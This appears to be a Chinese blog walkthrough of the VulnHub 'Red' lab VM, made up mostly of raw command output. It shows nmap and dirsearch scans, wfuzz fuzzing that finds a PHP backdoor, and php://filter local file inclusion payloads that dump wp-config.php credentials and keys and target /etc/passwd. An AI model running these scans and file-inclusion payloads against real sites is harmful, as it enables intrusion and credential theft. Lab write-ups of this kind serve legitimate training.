VulnHub—Red

已于 2022-03-23 11:00:00 修改
阅读量6.2k 收藏
点赞数 1
分类专栏: 笔记 文章标签: web安全
于 2022-03-23 10:58:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forever_Han13/article/details/123680583
版权 
$ sudo nmap -sP 192.168.0.1/24

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 02:44 CST
Nmap scan report for 192.168.0.1
Host is up (0.00045s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.13s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.13s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.13s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.13s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.108
Host is up (0.00056s latency).
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.109
Host is up (0.00079s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.101
Host is up.
Nmap done: 256 IP addresses (8 hosts up) scanned in 2.92 seconds

$ sudo nmap -sV -sC -A 192.168.0.108

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 02:44 CST
Nmap scan report for 192.168.0.108
Host is up (0.00045s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8d:53:65:83:52:52:c4:12:72:49:be:33:5d:d1:e7:1c (RSA)
|   256 06:61:0a:49:86:43:64:ca:b0:0c:0f:09:17:7b:33:ba (ECDSA)
|_  256 9b:8d:90:47:2a:c1:dc:11:28:7d:57:e0:8a:23:b4:69 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve...
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.0.108

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds

python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.108  -t 40 --exclude-status 403,401


  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40 | Wordlist size: 10780

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.108_22-03-22_02-46-10.txt

Target: http://192.168.0.108/

[02:46:10] Starting: 
[02:46:13] 301 -    0B  - /%2e%2e//google.com  ->  http://192.168.0.108/%2E%2E/google.com
[02:46:17] 301 -    0B  - /0  ->  http://192.168.0.108/0/
[02:46:19] 301 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  http://192.168.0.108/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[02:46:20] 301 -    0B  - /New%20folder%20(2)  ->  http://192.168.0.108/New%20folder%20(2
[02:46:21] 301 -    0B  - /PMA2/index.php  ->  http://192.168.0.108/PMA2/
[02:46:21] 301 -    0B  - /PMA/index.php  ->  http://192.168.0.108/PMA/
[02:46:25] 301 -    0B  - /adm/index.php  ->  http://192.168.0.108/adm/
[02:46:25] 302 -    0B  - /admin  ->  http://redrocks.win/wp-admin/
[02:46:26] 301 -    0B  - /admin.  ->  http://192.168.0.108/admin
[02:46:26] 302 -    0B  - /admin/  ->  http://redrocks.win/wp-admin/
[02:46:26] 301 -    0B  - /admin/PMA/index.php  ->  http://192.168.0.108/admin/PMA/
[02:46:27] 301 -    0B  - /admin/index.php  ->  http://192.168.0.108/admin/
[02:46:27] 301 -    0B  - /admin/mysql/index.php  ->  http://192.168.0.108/admin/mysql/
[02:46:27] 301 -    0B  - /admin/mysql2/index.php  ->  http://192.168.0.108/admin/mysql2/
[02:46:27] 301 -    0B  - /admin/phpmyadmin2/index.php  ->  http://192.168.0.108/admin/phpmyadmin2/
[02:46:27] 301 -    0B  - /admin/phpMyAdmin/index.php  ->  http://192.168.0.108/admin/phpMyAdmin/
[02:46:27] 301 -    0B  - /admin/phpmyadmin/index.php  ->  http://192.168.0.108/admin/phpmyadmin/
[02:46:27] 301 -    0B  - /admin/pma/index.php  ->  http://192.168.0.108/admin/pma/
[02:46:27] 301 -    0B  - /admin2/index.php  ->  http://192.168.0.108/admin2/
[02:46:28] 301 -    0B  - /admin_area/index.php  ->  http://192.168.0.108/admin_area/
[02:46:30] 301 -    0B  - /adminarea/index.php  ->  http://192.168.0.108/adminarea/
[02:46:30] 301 -    0B  - /admincp/index.php  ->  http://192.168.0.108/admincp/
[02:46:31] 301 -    0B  - /adminer/index.php  ->  http://192.168.0.108/adminer/
[02:46:31] 301 -    0B  - /administrator/index.php  ->  http://192.168.0.108/administrator/
[02:46:33] 301 -    0B  - /apc/index.php  ->  http://192.168.0.108/apc/
[02:46:34] 301 -    0B  - /asset..  ->  http://192.168.0.108/asset
[02:46:34] 301 -    0B  - /atom  ->  http://192.168.0.108/feed/atom/
[02:46:35] 301 -    0B  - /bb-admin/index.php  ->  http://192.168.0.108/bb-admin/
[02:46:35] 301 -    0B  - /bitrix/admin/index.php  ->  http://192.168.0.108/bitrix/admin/
[02:46:37] 301 -    0B  - /claroline/phpMyAdmin/index.php  ->  http://192.168.0.108/claroline/phpMyAdmin/
[02:46:40] 302 -    0B  - /dashboard  ->  http://redrocks.win/wp-admin/
[02:46:40] 302 -    0B  - /dashboard/  ->  http://redrocks.win/wp-admin/
[02:46:40] 301 -    0B  - /db/index.php  ->  http://192.168.0.108/db/
[02:46:40] 301 -    0B  - /dbadmin/index.php  ->  http://192.168.0.108/dbadmin/
[02:46:42] 301 -    0B  - /engine/classes/swfupload//swfupload.swf  ->  http://192.168.0.108/engine/classes/swfupload/swfupload.swf
[02:46:42] 301 -    0B  - /engine/classes/swfupload//swfupload_f9.swf  ->  http://192.168.0.108/engine/classes/swfupload/swfupload_f9.swf
[02:46:42] 301 -    0B  - /etc/lib/pChart2/examples/imageMap/index.php  ->  http://192.168.0.108/etc/lib/pChart2/examples/imageMap/
[02:46:43] 301 -    0B  - /extjs/resources//charts.swf  ->  http://192.168.0.108/extjs/resources/charts.swf
[02:46:43] 302 -    0B  - /favicon.ico  ->  http://redrocks.win/wp-includes/images/w-logo-blue-white-bg.png
[02:46:43] 301 -    0B  - /feed  ->  http://192.168.0.108/feed/
[02:46:45] 301 -    0B  - /html/js/misc/swfupload//swfupload.swf  ->  http://192.168.0.108/html/js/misc/swfupload/swfupload.swf
[02:46:46] 301 -    0B  - /index.php  ->  http://192.168.0.108/
[02:46:46] 301 -    0B  - /index.php/login/  ->  http://192.168.0.108/login/
[02:46:46] 301 -    0B  - /install/index.php?upgrade/  ->  http://192.168.0.108/install/?upgrade/
[02:46:47] 301 -    0B  - /jkstatus;  ->  http://192.168.0.108/jkstatus
[02:46:48] 200 -   19KB - /license.txt
[02:46:49] 302 -    0B  - /login  ->  http://redrocks.win/wp-login.php
[02:46:49] 301 -    0B  - /login.wdm%20  ->  http://192.168.0.108/login.wdm
[02:46:49] 302 -    0B  - /login/  ->  http://redrocks.win/wp-login.php
[02:46:49] 301 -    0B  - /login.wdm%2e  ->  http://192.168.0.108/login.wdm
[02:46:51] 301 -    0B  - /modelsearch/index.php  ->  http://192.168.0.108/modelsearch/
[02:46:52] 301 -    0B  - /myadmin/index.php  ->  http://192.168.0.108/myadmin/
[02:46:52] 301 -    0B  - /myadmin2/index.php  ->  http://192.168.0.108/myadmin2/
[02:46:52] 301 -    0B  - /mysql-admin/index.php  ->  http://192.168.0.108/mysql-admin/
[02:46:52] 301 -    0B  - /mysql/index.php  ->  http://192.168.0.108/mysql/
[02:46:52] 301 -    0B  - /mysqladmin/index.php  ->  http://192.168.0.108/mysqladmin/
[02:46:53] 301 -    0B  - /panel-administracion/index.php  ->  http://192.168.0.108/panel-administracion/
[02:46:55] 301 -    0B  - /phpMyAdmin/index.php  ->  http://192.168.0.108/phpMyAdmin/
[02:46:55] 301 -    0B  - /phpMyAdmin/phpMyAdmin/index.php  ->  http://192.168.0.108/phpMyAdmin/phpMyAdmin/
[02:46:55] 301 -    0B  - /phpMyAdmin.old/index.php  ->  http://192.168.0.108/phpMyAdmin.old/
[02:46:55] 301 -    0B  - /phpMyAdminold/index.php  ->  http://192.168.0.108/phpMyAdminold/
[02:46:55] 301 -    0B  - /phpMyadmin_bak/index.php  ->  http://192.168.0.108/phpMyadmin_bak/
[02:46:55] 301 -    0B  - /phpadmin/index.php  ->  http://192.168.0.108/phpadmin/
[02:46:55] 301 -    0B  - /phpma/index.php  ->  http://192.168.0.108/phpma/
[02:46:55] 301 -    0B  - /phpmyadmin!!  ->  http://192.168.0.108/phpmyadmin
[02:46:55] 301 -    0B  - /phpmyadmin-old/index.php  ->  http://192.168.0.108/phpmyadmin-old/
[02:46:55] 301 -    0B  - /phpmyadmin/phpmyadmin/index.php  ->  http://192.168.0.108/phpmyadmin/phpmyadmin/
[02:46:55] 301 -    0B  - /phpmyadmin0/index.php  ->  http://192.168.0.108/phpmyadmin0/
[02:46:55] 301 -    0B  - /phpmyadmin/index.php  ->  http://192.168.0.108/phpmyadmin/
[02:46:55] 301 -    0B  - /phpmyadmin1/index.php  ->  http://192.168.0.108/phpmyadmin1/
[02:46:55] 301 -    0B  - /phpmyadmin2/index.php  ->  http://192.168.0.108/phpmyadmin2/
[02:46:56] 301 -    0B  - /pma/index.php  ->  http://192.168.0.108/pma/
[02:46:56] 301 -    0B  - /pma-old/index.php  ->  http://192.168.0.108/pma-old/
[02:46:56] 301 -    0B  - /pmamy/index.php  ->  http://192.168.0.108/pmamy/
[02:46:56] 301 -    0B  - /pmamy2/index.php  ->  http://192.168.0.108/pmamy2/
[02:46:56] 301 -    0B  - /pmd/index.php  ->  http://192.168.0.108/pmd/
[02:46:57] 200 -    7KB - /readme.html
[02:46:57] 301 -    0B  - /rating_over.  ->  http://192.168.0.108/rating_over
[02:46:58] 200 -  112B  - /robots.txt
[02:46:58] 301 -    0B  - /roundcube/index.php  ->  http://192.168.0.108/roundcube/
[02:46:58] 301 -    0B  - /rss  ->  http://192.168.0.108/feed/
[02:47:00] 301 -    0B  - /siteadmin/index.php  ->  http://192.168.0.108/siteadmin/
[02:47:00] 302 -    0B  - /sitemap.xml  ->  http://redrocks.win/wp-sitemap.xml
[02:47:01] 301 -    0B  - /sql/index.php  ->  http://192.168.0.108/sql/
[02:47:01] 301 -    0B  - /static..  ->  http://192.168.0.108/static
[02:47:02] 301 -    0B  - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates  ->  http://192.168.0.108/sugarcrm/?module=Accounts&action=ShowDuplicates
[02:47:02] 301 -    0B  - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates  ->  http://192.168.0.108/sugarcrm/?module=Contacts&action=ShowDuplicates
[02:47:03] 301 -    0B  - /templates/beez/index.php  ->  http://192.168.0.108/templates/beez/
[02:47:03] 301 -    0B  - /templates/rhuk_milkyway/index.php  ->  http://192.168.0.108/templates/rhuk_milkyway/
[02:47:03] 301 -    0B  - /templates/ja-helio-farsi/index.php  ->  http://192.168.0.108/templates/ja-helio-farsi/
[02:47:03] 301 -    0B  - /tmp/index.php  ->  http://192.168.0.108/tmp/
[02:47:03] 301 -    0B  - /tools/phpMyAdmin/index.php  ->  http://192.168.0.108/tools/phpMyAdmin/
[02:47:04] 301 -    0B  - /typo3/phpmyadmin/index.php  ->  http://192.168.0.108/typo3/phpmyadmin/
[02:47:06] 301 -    0B  - /web/phpMyAdmin/index.php  ->  http://192.168.0.108/web/phpMyAdmin/
[02:47:06] 301 -    0B  - /webadmin/index.php  ->  http://192.168.0.108/webadmin/
[02:47:06] 301 -  317B  - /wp-admin  ->  http://192.168.0.108/wp-admin/
[02:47:06] 301 -  319B  - /wp-content  ->  http://192.168.0.108/wp-content/
[02:47:06] 200 -    0B  - /wp-content/
[02:47:06] 400 -    1B  - /wp-admin/admin-ajax.php
[02:47:06] 200 -    0B  - /wp-config.php
[02:47:06] 500 -  610B  - /wp-content/plugins/akismet/akismet.php
[02:47:06] 500 -  610B  - /wp-content/plugins/akismet/admin.php
[02:47:06] 500 -    0B  - /wp-content/plugins/hello.php
[02:47:06] 301 -  320B  - /wp-includes  ->  http://192.168.0.108/wp-includes/
[02:47:06] 200 -    0B  - /wp-includes/rss-functions.php
[02:47:06] 301 -    0B  - /wp-content/plugins/adminer/inc/editor/index.php  ->  http://192.168.0.108/wp-content/plugins/adminer/inc/editor/
[02:47:07] 200 -    0B  - /wp-cron.php
[02:47:07] 301 -    0B  - /wp-register.php  ->  http://redrocks.win/wp-login.php?action=register
[02:47:07] 200 -  110KB - /wp-json/
[02:47:07] 200 -  595B  - /wp-json/wp/v2/users/
[02:47:07] 302 -    0B  - /wp-signup.php  ->  http://redrocks.win/wp-login.php?action=register
[02:47:07] 200 -    6KB - /wp-login.php
[02:47:07] 301 -    0B  - /www/phpMyAdmin/index.php  ->  http://192.168.0.108/www/phpMyAdmin/
[02:47:07] 301 -    0B  - /xampp/phpmyadmin/index.php  ->  http://192.168.0.108/xampp/phpmyadmin/
[02:47:07] 302 -    0B  - /wp-admin/  ->  http://redrocks.win/wp-login.php?redirect_to=http%3A%2F%2F192.168.0.108%2Fwp-admin%2F&reauth=1
[02:47:07] 409 -    3KB - /wp-admin/setup-config.php
[02:47:07] 200 -    1KB - /wp-admin/install.php
[02:47:07] 405 -   42B  - /xmlrpc.php

Task Completed

$ sudo vim /etc/hosts

127.0.0.1 localhost
127.0.1.1 kali
192.168.0.108   redrocks.win

$ python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.108  -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -t 40 --exclude-status 403,401


  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40
Wordlist size: 148

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.108_22-03-22_03-09-24.txt

Target: http://192.168.0.108/

[03:09:24] Starting: 
[03:09:26] 500 -    0B  - /NetworkFileManagerPHP.php

Task Completed

 $ wfuzz -c  -u 'http://192.168.0.108/NetworkFileManagerPHP.php?FUZZ=ls'  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.0.108/NetworkFileManagerPHP.php?FUZZ=ls
Total requests: 2588

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                                                                                                      
=====================================================================

000000026:   200        1 L      0 W        1 Ch        "key"                                                                                                                                                                                                                                                        
000000003:   500        0 L      0 W        0 Ch        "page"                                                                                                                                                                                                                                                       
000000028:   500        0 L      0 W        0 Ch        "start"                                                                                                                                                                                                                                                      
000000015:   500        0 L      0 W        0 Ch        "user"                                                                                                                                                                                                                                                       
000000022:   500        0 L      0 W        0 Ch        "mode"                                                                                                                                                                                                                                                       
000000023:   500        0 L      0 W        0 Ch        "order"                                                                                                                                                                                                                                                      
                                                                                                                                                                                                       
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 150.3562
Processed Requests: 79
Filtered Requests: 0
Requests/sec.: 0.525418

http://192.168.0.108/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=NetworkFileManagerPHP.php

PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewogICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUoIk5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJR0Z5WlNCeWRXeGxjdz09ICovCj8+Cgo= 

<?php
   $file = $_GET['key'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("NetworkFileManagerPHP.php");
   }
   /* That password alone won't help you! Hashcat says rules are rules */
?>

http://192.168.0.108/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php

PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUgaW5zdGFsbGF0aW9uLg0KICogWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbiBjb3B5IHRoaXMgZmlsZSB0byAid3AtY29uZmlnLnBocCINCiAqIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQovLyAqKiBNeVNRTCBzZXR0aW5ncyAtIFlvdSBjYW4gZ2V0IHRoaXMgaW5mbyBmcm9tIHlvdXIgd2ViIGhvc3QgKiogLy8NCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICd3b3JkcHJlc3MnICk7DQoNCi8qKiBNeVNRTCBkYXRhYmFzZSB1c2VybmFtZSAqLw0KZGVmaW5lKCAnREJfVVNFUicsICdqb2huJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgcGFzc3dvcmQgKi8NCmRlZmluZSggJ0RCX1BBU1NXT1JEJywgJ1Izdl9tNGx3aDNyM19rMW5HISEnICk7DQoNCi8qKiBNeVNRTCBob3N0bmFtZSAqLw0KZGVmaW5lKCAnREJfSE9TVCcsICdsb2NhbGhvc3QnICk7DQoNCi8qKiBEYXRhYmFzZSBDaGFyc2V0IHRvIHVzZSBpbiBjcmVhdGluZyBkYXRhYmFzZSB0YWJsZXMuICovDQpkZWZpbmUoICdEQl9DSEFSU0VUJywgJ3V0ZjgnICk7DQoNCi8qKiBUaGUgRGF0YWJhc2UgQ29sbGF0ZSB0eXBlLiBEb24ndCBjaGFuZ2UgdGhpcyBpZiBpbiBkb3VidC4gKi8NCmRlZmluZSggJ0RCX0NPTExBVEUnLCAnJyApOw0KDQpkZWZpbmUoJ0ZTX01FVEhPRCcsICdkaXJlY3QnKTsNCg0KZGVmaW5lKCdXUF9TSVRFVVJMJywgJ2h0dHA6Ly9yZWRyb2Nrcy53aW4nKTsNCmRlZmluZSgnV1BfSE9NRScsICdodHRwOi8vcmVkcm9ja3Mud2luJyk7DQoNCi8qKiNAKw0KICogQXV0aGVudGljYXRpb24gdW5pcXVlIGtleXMgYW5kIHNhbHRzLg0KICoNCiAqIENoYW5nZSB0aGVzZSB0byBkaWZmZXJlbnQgdW5pcXVlIHBocmFzZXMhIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcNCiAqIHRoZSB7QGxpbmsgaHR0cHM6Ly9hcGkud29yZHByZXNzLm9yZy9zZWNyZXQta2V5LzEuMS9zYWx0LyBXb3JkUHJlc3Mub3JnIHNlY3JldC1rZXkgc2VydmljZX0uDQogKg0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4NCiAqIFRoaXMgd2lsbCBmb3JjZSBhbGwgdXNlcnMgdG8gaGF2ZSB0byBsb2cgaW4gYWdhaW4uDQogKg0KICogQHNpbmNlIDIuNi4wDQogKi8NCmRlZmluZSgnQVVUSF9LRVknLCAgICAgICAgICcydXVCdmM4U081ez5Vd1E8XjVWNVtVSEJ3JU59LUJ3V3F3fD48KkhmQndKKCAkJiUsKFpiZy9qd0ZrUkhmfnZ8Jyk7DQpkZWZpbmUoJ1NFQ1VSRV9BVVRIX0tFWScsICAnYWh9PElgNTJHTDZDXkB+eCBDOUZwTXEtKXR4Z09tQTx+e1I1a3RZL0AuXWRCRj9rZUIzfStZXnUhYTU0IFhjKCcpOw0KZGVmaW5lKCdMT0dHRURfSU5fS0VZJywgICAgJ1thIUt9RDw3LXZCM1kmeF88M2VdV2QrSl0hbytBOlVAUVVaLVJVMV10T0AvTn1ifVJAKy8kK3UqcEp8Wih4dS0nKTsNCmRlZmluZSgnTk9OQ0VfS0VZJywgICAgICAgICcgZzR8QH46aCxLMjlEfSRGTC1mL2V1ancoVlQ7OHdhN3hSV3BWUjogPn0sXSFFei40OEU6b2sgOElwfjVfbythJyk7DQpkZWZpbmUoJ0FVVEhfU0FMVCcsICAgICAgICAnYTssTzx+dmJwTCt8QFcrIVJzMW8sVCRyOShMd2FYSSA9STdaVyQuWlsrQlE9QjZRRzducit3X2JRNkJdNXE0YycpOw0KZGVmaW5lKCdTRUNVUkVfQVVUSF9TQUxUJywgJ0drVTolIExvfSA5fXczOGk6JV09dXEmSjZaJlJSI3YydnNCNWFfICsuW3VzOzZtRSt8JHgqKyBEKktlKzpOdDonKTsNCmRlZmluZSgnTE9HR0VEX0lOX1NBTFQnLCAgICcjYEY5JnBtX2pZfU4zeTAmOFpdRWVMKXosJDM5LHlGYyROcWBqR09NVF9hTSpgPCQ5QTo5PEtrXkx9ZlhAK2laJyk7DQpkZWZpbmUoJ05PTkNFX1NBTFQnLCAgICAgICAnaFRsRkUqNnpsWk1icWx1eiloZjotOngtOmw4OWZDNG90Y2k7Mzh8aWA3ZVUxOytrWyEwW1pHLm9DdDJALXkzWCcpOw0KDQovKiojQC0qLw0KDQovKioNCiAqIFdvcmRQcmVzcyBkYXRhYmFzZSB0YWJsZSBwcmVmaXguDQogKg0KICogWW91IGNhbiBoYXZlIG11bHRpcGxlIGluc3RhbGxhdGlvbnMgaW4gb25lIGRhdGFiYXNlIGlmIHlvdSBnaXZlIGVhY2gNCiAqIGEgdW5pcXVlIHByZWZpeC4gT25seSBudW1iZXJzLCBsZXR0ZXJzLCBhbmQgdW5kZXJzY29yZXMgcGxlYXNlIQ0KICovDQokdGFibGVfcHJlZml4ID0gJ3dwXyc7DQoNCi8qKg0KICogRm9yIGRldmVsb3BlcnM6IFdvcmRQcmVzcyBkZWJ1Z2dpbmcgbW9kZS4NCiAqDQogKiBDaGFuZ2UgdGhpcyB0byB0cnVlIHRvIGVuYWJsZSB0aGUgZGlzcGxheSBvZiBub3RpY2VzIGR1cmluZyBkZXZlbG9wbWVudC4NCiAqIEl0IGlzIHN0cm9uZ2x5IHJlY29tbWVuZGVkIHRoYXQgcGx1Z2luIGFuZCB0aGVtZSBkZXZlbG9wZXJzIHVzZSBXUF9ERUJVRw0KICogaW4gdGhlaXIgZGV2ZWxvcG1lbnQgZW52aXJvbm1lbnRzLg0KICoNCiAqIEZvciBpbmZvcm1hdGlvbiBvbiBvdGhlciBjb25zdGFudHMgdGhhdCBjYW4gYmUgdXNlZCBmb3IgZGVidWdnaW5nLA0KICogdmlzaXQgdGhlIGRvY3VtZW50YXRpb24uDQogKg0KICogQGxpbmsgaHR0cHM6Ly93b3JkcHJlc3Mub3JnL3N1cHBvcnQvYXJ0aWNsZS9kZWJ1Z2dpbmctaW4td29yZHByZXNzLw0KICovDQpkZWZpbmUoICdXUF9ERUJVRycsIGZhbHNlICk7DQoNCi8qIEFkZCBhbnkgY3VzdG9tIHZhbHVlcyBiZXR3ZWVuIHRoaXMgbGluZSBhbmQgdGhlICJzdG9wIGVkaXRpbmciIGxpbmUuICovDQoNCg0KDQovKiBUaGF0J3MgYWxsLCBzdG9wIGVkaXRpbmchIEhhcHB5IHB1Ymxpc2hpbmcuICovDQoNCi8qKiBBYnNvbHV0ZSBwYXRoIHRvIHRoZSBXb3JkUHJlc3MgZGlyZWN0b3J5LiAqLw0KaWYgKCAhIGRlZmluZWQoICdBQlNQQVRIJyApICkgew0KCWRlZmluZSggJ0FCU1BBVEgnLCBfX0RJUl9fIC4gJy8nICk7DQp9DQoNCi8qKiBTZXRzIHVwIFdvcmRQcmVzcyB2YXJzIGFuZCBpbmNsdWRlZCBmaWxlcy4gKi8NCnJlcXVpcmVfb25jZSBBQlNQQVRIIC4gJ3dwLXNldHRpbmdzLnBocCc7DQo=

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define('FS_METHOD', 'direct');

define('WP_SITEURL', 'http://redrocks.win');
define('WP_HOME', 'http://redrocks.win');

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
define('SECURE_AUTH_KEY',  'ah}<I`52GL6C^@~x C9FpMq-)txgOmA<~{R5ktY/@.]dBF?keB3}+Y^u!a54 Xc(');
define('LOGGED_IN_KEY',    '[a!K}D<7-vB3Y&x_<3e]Wd+J]!o+A:U@QUZ-RU1]tO@/N}b}R@+/$+u*pJ|Z(xu-');
define('NONCE_KEY',        ' g4|@~:h,K29D}$FL-f/eujw(VT;8wa7xRWpVR: >},]!Ez.48E:ok 8Ip~5_o+a');
define('AUTH_SALT',        'a;,O<~vbpL+|@W+!Rs1o,T$r9(LwaXI =I7ZW$.Z[+BQ=B6QG7nr+w_bQ6B]5q4c');
define('SECURE_AUTH_SALT', 'GkU:% Lo} 9}w38i:%]=uq&J6Z&RR#v2vsB5a_ +.[us;6mE+|$x*+ D*Ke+:Nt:');
define('LOGGED_IN_SALT',   '#`F9&pm_jY}N3y0&8Z]EeL)z,$39,yFc$Nq`jGOMT_aM*`<$9A:9<Kk^L}fX@+iZ');
define('NONCE_SALT',       'hTlFE*6zlZMbqluz)hf:-:x-:l89fC4otci;38|i`7eU1;+k[!0[ZG.oCt2@-y3X');

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
 define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
ø((=

http://192.168.0.108/NetworkFileManagerPHP.php?key=php://filter/resource=../../../etc/passwd

